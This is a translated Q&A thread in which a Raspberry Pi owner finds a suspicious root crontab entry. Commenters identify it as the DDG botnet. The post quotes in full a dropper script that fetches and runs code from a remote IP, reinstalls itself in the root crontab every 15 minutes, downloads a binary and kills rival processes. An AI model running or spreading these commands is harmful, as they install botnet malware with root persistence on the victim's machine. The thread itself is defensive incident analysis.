我想在Raspberry Pi上的根crontab文件中添加一些内容,但发现一个对我来说似乎可疑的条目,在Google上搜索它的部分内容没有任何结果。
Crontab条目:
*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -m180 -fsSL http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh
的内容http://103.219.112.66:8000/i.sh
是:
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
mkdir -p /var/spool/cron/crontabs
echo "" > /var/spool/cron/root
echo "*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -fsSL -m180 http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh" >> /var/spool/cron/root
cp -f /var/spool/cron/root /var/spool/cron/crontabs/root
cd /tmp
touch /usr/local/bin/writeable && cd /usr/local/bin/
touch /usr/libexec/writeable && cd /usr/libexec/
touch /usr/bin/writeable && cd /usr/bin/
rm -rf /usr/local/bin/writeable /usr/libexec/writeable /usr/bin/writeable
export PATH=$PATH:$(pwd)
ps auxf | grep -v grep | grep xribfa4 || rm -rf xribfa4
if [ ! -f "xribfa4" ]; then
curl -fsSL -m1800 http://103.219.112.66:8000/static/4004/ddgs.$(uname -m) -o xribfa4||wget -q -T1800 http://103.219.112.66:8000/static/4004/ddgs.$(uname -m) -O xribfa4
fi
chmod +x xribfa4
/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4
ps auxf | grep -v grep | grep xribbcb | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribbcc | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribbcd | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribbce | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa0 | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa1 | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa2 | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa3 | awk '{print $2}' | xargs kill -9
echo "*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -m180 -fsSL http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh" | crontab -
我的Linux知识是有限的,但是对我来说,从印尼服务器下载二进制文件并定期以root用户身份运行它们并不是很平常的事情。
这是什么?我该怎么办?
16
它是圆形的。每隔15分钟,它会下载并安装一个新的副本。如果/当更改远程服务器上的副本时,所有运行此cronjob的服务器将在15分钟内执行新代码。
—
通配符
您的树莓派可以上网吗?您的树莓派正在运行什么?当我搜索xribfa4时,这是Google上唯一的结果。如果您没有运行需要执行此操作的软件,则可能是病毒。
—
kemotep
@kemotep该字符串是随机的,但是google为IP,它给出了一些结果。关于ddg僵尸网络的事
—
frostschutz
我找到了。知识产权在印度尼西亚政府站点上注册非常疯狂。看起来也有将近2000个其他ip传送此有效负载。
—
kemotep
您必须意识到的主要事情是,即使删除了该crontab条目,您的系统也很可能仍然具有允许其被感染的漏洞。您需要找到并修复该漏洞。
—
Hans-Martin Mosner